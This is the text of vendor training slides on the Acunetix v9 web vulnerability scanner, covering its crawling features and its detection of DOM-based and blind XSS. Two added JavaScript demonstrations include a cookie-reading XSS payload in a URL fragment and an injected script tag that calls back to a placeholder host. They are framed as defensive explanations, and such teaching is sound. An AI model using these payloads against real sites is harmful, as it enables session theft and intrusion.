TECHNICAL OVERVIEW - E-SPIN Group

Page 1

Acunetix Web Vulnerability Scanner (WVS) TECHNICAL OVERVIEW

Ver. 9.x Updated

© Since 2005 E-SPIN GROUP OF COMPANIES. All Rights Reserved. www.e-spincorp.com

Page 2

Copyrighted

Copyright © 2005 - 2014 by E-SPIN GROUP OF COMPANIES. All rights reserved.

No part of this training presentation/handout may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, electronic, mechanical, photocopying, recording, scanning, or otherwise, without the prior written permission of E-SPIN. Please contact the respective E-SPIN offices and business centres across the region, or visit www.e-spincorp.com.

Limit of Liability / Disclaimer of Warranty: While the authors have used their best efforts in preparing this training presentation/handout, they make no representations or warranties with respect to the accuracy or completeness of the contents and specifically disclaim any implied warranties of merchantability or fitness for a particular purpose. No warranty may be created or extended by sales representatives or written sales materials. The advice and strategies contained herein may not be suitable for every situation. You should consult with a professional where appropriate. The authors shall not be liable for any loss of profit or any other commercial damages, including but not limited to special, incidental, consequential, or other damages.

For general information on our other products and services or for technical support, please contact our respective E-SPIN offices and business centres, partners across the region, or email [email protected].

Page 3

What can you expect from the event?

Acunetix v9 Technical Overview ● What's new

Frequently Asked Questions ● Common questions and concerns

Lunch and Social Event ● complimentary lunch ● social gathering

Page 4

Is Your Website Hackable? Check with Acunetix Web Vulnerability Scanner.

Acunetix Web Vulnerability Scanner V9 Technical Overview

E-SPIN Group of Companies (Enterprise Solution Professional on Information and Network) www.e-spincorp.com

Page 5

Combatting the Web Vulnerability Threat www.acunetix.com

WVS V9 in a nutshell - 1 of 2

•FULL HTML5 support

•Improved crawling capabilities, with particular attention to dynamic pages using AJAX, JavaScript and Single Page Applications

•Improved support for Mobile friendly sites

Page 6

WVS V9 in a nutshell – 2 of 2

•Detection of DOM based XSS

•Detection of Blind XSS (unique to WVS)

•Detection of new vulnerabilities
  •Server Side Request Forgery (SSRF)
  •XML External Entity (XXE)
  •Mail Header Injection
  •Host Header based attacks

Page 7

FULL HTML5 support

•New HTML / Script evaluation engine

•Same as the one used in Chrome / Safari

•Used in 40% of the world’s internet browsing

•Introduces FULL support for HTML5
  •34% of Alexa's Top 100 sites implemented in HTML5 in Sept 2011
  •HTML5 will eventually replace Flash

Page 8

Improved Crawling capabilities

•Superior JavaScript evaluation

•Increased support for AJAX sites and other JavaScript based web sites

•Introduced support for Single Page Applications (SPA)

•You can only scan what has been crawled: any page, route or request the crawler never reaches is never tested

Page 9

Single Page Application (SPA)

A single-page application (SPA), also known as a single-page interface (SPI), is a web application or web site that fits on a single web page, with the goal of providing a more fluid user experience akin to a desktop application.

In an SPA, either all necessary code – HTML, JavaScript, and CSS – is retrieved with a single page load, or the appropriate resources are dynamically loaded and added to the page as necessary, usually in response to user actions. The page does not reload at any point in the process, nor does control transfer to another page, although modern web technologies (such as those included in HTML5) can provide the perception and navigability of separate logical pages in the application. Interaction with the single page application often involves dynamic communication with the web server behind the scenes.

Page 10

Improved support for Mobile Friendly sites 1 of 2

•1 billion smartphones used worldwide

•In Asia, Internet browsing from mobile increased threefold between 2011 and 2012

•2 versions of the same website – one for normal browsers, and another for mobiles, smartphones and tablets

Page 11

Improved support for Mobile Friendly sites 2 of 2

•WVS v9 detects mobile friendly sites at pre-crawl stage and gives option to focus the scan on one version of the site

•Our HTML / Script evaluation engine is the layout engine of choice for the default browsers in iPhone, Android, Blackberry and Amazon Kindle.

Page 12

Detection of DOM XSS – 1 of 2

•3 types of XSS – Stored, Reflected and DOM based

•OWASP Top 10, 2013 classifies XSS as ‘Very Widespread’

•Client-side scripts routinely read from and write to the Document Object Model (DOM)

•When a script copies attacker-controllable data (for example from location.hash, location.search or document.referrer) into the DOM without encoding it, the attacker can introduce custom scripts into the DOM

Page 13

Detection of DOM XSS – 2 of 2

•Different from Stored or Reflected XSS, since the payload is placed in the DOM (in the browser) and not in the page served by the web site

•When the payload travels in the URL fragment (after #), the browser never sends it to the server, so exploitation leaves no trace in the web site owner's logs

•Detection requires advanced interpretation of JavaScript

Page 14

DOM Based XSS

DOM Based XSS (or as it is called in some texts, “type-0 XSS”) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. That is, the page itself (the HTTP response that is) does not change, but the client side code contained in the page executes differently due to the malicious modifications that have occurred in the DOM environment.

This is in contrast to other XSS attacks (stored or reflected), wherein the attack payload is placed in the response page (due to a server side flaw).

Acunetix WVS version 9 introduces DeepScan technology, which improves the automatic detection of DOM-based XSS by tracing the execution of the script code from the scanned website.
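The DOM-based XSS described on the two slides above, as an added example that is not code from Acunetix or E-SPIN. The page logic, the hostname www.example.com and the function names are hypothetical. It runs under Node.js without a browser: the "page" is modelled as a function returning the HTML it would write into the document, which makes the vulnerable sink, its hardened form and the "payload never reaches the server" point checkable side by side.

```javascript
// Added example, not code from the Acunetix/E-SPIN slides: a DOM-based XSS
// sink beside its hardened form, plus a check showing why the payload never
// reaches the server. Runs under Node.js without a browser: the "page" is
// modelled as a function that returns the HTML it would write into the document.

// Hypothetical page logic: greet the visitor by the name in the URL fragment.
// Vulnerable sink: location.hash is decoded and concatenated into markup that
// the real page would hand to document.write / innerHTML.
function renderGreetingVulnerable(hash) {
  const name = decodeURIComponent(hash.replace(/^#/, ""));
  return "<h1>Welcome " + name + "</h1>";
}

// Minimal encoder for an HTML text context (the five characters that matter).
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened form: encode before insertion. In a real page, assigning the name
// to element.textContent instead of building markup avoids the sink entirely.
function renderGreetingSafe(hash) {
  const name = decodeURIComponent(hash.replace(/^#/, ""));
  return "<h1>Welcome " + escapeHtml(name) + "</h1>";
}

// Did user-controlled data open a tag that the template did not contain?
// A scanner answers this by executing the page in a real script engine; this
// regex only checks the single sink modelled above.
function containsInjectedTag(html) {
  const body = html.slice("<h1>Welcome ".length, -"</h1>".length);
  return /<[a-z!\/?]/i.test(body);
}

// The request line a browser builds for a URL: the fragment is dropped before
// the request is sent, so the payload never appears in server logs.
function requestLineFor(url) {
  const u = new URL(url);
  return `GET ${u.pathname}${u.search} HTTP/1.1`;
}

// Constructed attack URL (www.example.com is a placeholder host). The
// fragment decodes to: <img src=x onerror=alert(document.cookie)>
const attackUrl =
  "https://www.example.com/welcome.html?lang=en#%3Cimg%20src%3Dx%20onerror%3Dalert(document.cookie)%3E";

const attackHash = new URL(attackUrl).hash;
console.log(requestLineFor(attackUrl));            // no fragment on the wire
console.log("vulnerable:", renderGreetingVulnerable(attackHash));
console.log("hardened:  ", renderGreetingSafe(attackHash));
```

The request line shows only `/welcome.html?lang=en`; the `onerror` payload lives entirely in the fragment, which is why a server-side log review or a WAF sees nothing, and why a scanner has to evaluate the page's JavaScript rather than inspect HTTP traffic to find this class of bug.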

Page 15

Detection of Blind XSS - 1 of 3

•Blind XSS is a type of Stored XSS where the payload is injected through one web application and executed in another, usually an internal application (support portal, admin panel, log viewer) that the attacker never sees

•Example:
  •Hacker injects XSS into the support request form on the public website
  •The XSS executes when Support opens the request in the Support portal

Page 16

Detection of Blind XSS - 2 of 3

•Blind XSS detection requires Acunetix Vulnerability Verification Service (VVS) to be enabled

•How blind XSS detection works
  •Acunetix WVS probes an XSS-prone web form and injects script payloads into it
  •The scripts are stored in the database but never executed on the main web application, so nothing is reflected in the immediate response
  •Some time later, the script is executed from another web application; when it runs, it makes a web request to VVS

Page 17

Detection of Blind XSS - 3 of 3

Flow (actors: VVS, Admin): Scan Web Site → XSS stored in DB → XSS loaded in backend webapp → Script informs VVS → VVS informs admin by email

Page 18

Blind XSS

Blind XSS is a flavor of cross site scripting (XSS), where the attacker “blindly” deploys a series of malicious payloads on web pages that are likely to save them to a persistent state (like in a database, or in a log file). Then, without knowing any details about where the payloads have ended up, or if (and when) they are going to be executed, the attacker waits for the payloads to be pulled out of storage and rendered on a web page loaded by a user.
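The detection loop on the three Blind XSS slides above, as an added example that is not code from Acunetix or E-SPIN. Every component is simulated in-process under Node.js: the scanned site and its database, the separate back-office portal, the support agent's browser, and the callback service standing in for VVS. The hostnames (shop.example.com, backoffice.example.com, vvs.example.net), the CallbackService class and all function names are placeholders, and the token generator is demo-only.

```javascript
// Added example, not code from the Acunetix/E-SPIN slides: a self-contained
// model of blind XSS detection. All hostnames and names are placeholders.

// --- Callback service (stands in for Acunetix VVS) -------------------------
class CallbackService {
  constructor(baseUrl) {
    this.baseUrl = baseUrl;   // placeholder, e.g. "https://vvs.example.net"
    this.pending = new Map(); // token -> where the payload was injected
    this.hits = [];           // callbacks received so far
  }
  // Register an injection point and return a payload carrying a unique token.
  // The token is what maps a callback, however much later it fires, back to
  // the exact form field that was probed.
  issuePayload(site, path, param) {
    // Demo-only token; a real service uses a CSPRNG.
    const token = "t" + Date.now().toString(36) + Math.random().toString(36).slice(2, 10);
    this.pending.set(token, { site, path, param, issuedAt: Date.now() });
    return `<script src="${this.baseUrl}/cb/${token}"></script>`;
  }
  // Called when some browser somewhere executed the payload.
  receive(token, origin) {
    const injection = this.pending.get(token);
    if (!injection) return false; // unknown token: ignore
    this.hits.push({ token, origin, ...injection });
    return true;
  }
  // What the service would put in its notification e-mail to the admin.
  findings() {
    return this.hits.map((h) =>
      `Blind XSS: payload injected into ${h.site}${h.path} parameter "${h.param}" executed at ${h.origin}`);
  }
}

// --- Scanned site: public support form stores the ticket, reflects nothing --
const ticketDb = [];
function submitTicket(subject, message) {
  ticketDb.push({ id: ticketDb.length + 1, subject, message });
  return "<p>Thanks, we will get back to you.</p>"; // payload absent from response
}

// --- Separate back-office portal: renders tickets without output encoding --
function renderTicketForAgent(ticket) {
  return `<tr><td>${ticket.id}</td><td>${ticket.subject}</td><td>${ticket.message}</td></tr>`;
}

// --- Support agent's browser: loads every callback <script src> it finds ---
function agentBrowserLoads(html, svc, origin) {
  const re = new RegExp(`<script src="${svc.baseUrl}/cb/([a-z0-9]+)"><\\/script>`, "g");
  let m, executed = 0;
  while ((m = re.exec(html)) !== null) {
    if (svc.receive(m[1], origin)) executed++;
  }
  return executed;
}

// --- The scan ----------------------------------------------------------------
function runBlindXssScan() {
  const svc = new CallbackService("https://vvs.example.net");
  // Phase 1: the scanner probes the form. A conventional reflected/stored
  // check asks whether the payload shows up in the immediate response: it does not.
  const payload = svc.issuePayload("https://shop.example.com", "/support", "message");
  const response = submitTicket("Order problem", "Hello " + payload);
  const reflected = response.includes(payload);
  // Phase 2 (any time later): an agent opens the ticket list in the portal.
  const portalPage = ticketDb.map(renderTicketForAgent).join("\n");
  const executed = agentBrowserLoads(portalPage, svc, "https://backoffice.example.com/tickets");
  return { reflected, executed, findings: svc.findings() };
}

const result = runBlindXssScan();
console.log("reflected in immediate response:", result.reflected);
console.log("callbacks received:", result.executed);
console.log(result.findings.join("\n"));
```

Two practical points follow from the model. The fix belongs in the application that renders the stored data (here the back-office portal's renderTicketForAgent), not only in the public form, because the public site was never the place where the script ran. And the callback service must be reachable from wherever the payload eventually executes: if the back-office network blocks outbound requests, the payload still fires but the scanner never learns of it, and the finding is silently missed rather than reported as safe.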

Page 19

Detection of New Vulnerabilities

•Server Side Request Forgery (SSRF)

•XML External Entity (XXE)

•Mail Header Injection

•Host Header based attacks

Page 20

Thank You. Contact Us: [email protected]

E-SPIN Group of Companies: strategic presence across the region
E-SPIN SDN. BHD. (714753-U)
E-SPIN INTERNATIONAL LIMITED 億轉國際有限公司 (1970945)
E-SPIN INTERNATIONAL PTE. LTD. (201312412W)

Malaysia: No. 21-2, Jalan PJU 8/3B, Perdana Business Centre, Damansara Perdana, 47820 Petaling Jaya, Selangor, Malaysia. Tel: +603 7728 2866, Fax: +603 7725 4757

Hong Kong/Macau/China: Room 1104, Crawford House, 70 Queen Road Central, Central, Hong Kong Island, Hong Kong. Tel: +852 2165 4773, +852 8199 9799, Fax: +852 3182 5473

Singapore: 10 Anson Road, #18-17 International Plaza, Singapore 079903. Tel: +65 6223 2069 / +65 3158 2203, Fax: +65 6338 6311

Indonesia: Office 8, Level 18-A, Jalan Jend Sudirman Kav. 52-53, Sudirman Central Business District (SCBD), Jakarta Selatan, Daerah Khusus Ibukota Jakarta 12190, Indonesia. Tel: +6221 2960 8334, Fax: +6221 2960 8335

Thailand: 195 Unit 4703, 47th Floor, Empire Tower, South Sathorn Road, Yannawa, Sathorn, Bangkok 10120, Thailand. Tel: +66 2686 3483, Fax: +66 2686 3433

Page 21

Frequently Asked Questions (FAQ)

Page 22

FAQ

● Upgrading

● Migration from old version to new version

● Installation and license activation

Page 23

Extra Slides

Page 24

E-SPIN Threat and Vulnerability Management Solutions

Page 25

IT Auditing Tools and Techniques

Page 26

IT Auditing Tools and Techniques

Page 27

End to End Vulnerability Management

Web & Application

Unified Vulnerability Management

Penetration Testing

Page 28

Web Hacking Methodology

Page 29

Web Hacking Tools and Techniques

Page 30

Web Application Architecture

Page 31

Types of Application Security Testing (AST)

DAST IAST SAST

Page 32

Acunetix AcuSensor

● Beyond black box scanning

● Checks web technology configuration

● Fewer false positives

● No URL rewrite rules

Page 33

Types Of Cross-Site Scripting (XSS)

Cross-Site Scripting (XSS) attacks are a type of injection problem, in which malicious scripts are injected into web sites.

Types Of Cross-Site Scripting
● Reflected XSS (Non-persistent)
● Stored XSS (Persistent)
● DOM XSS
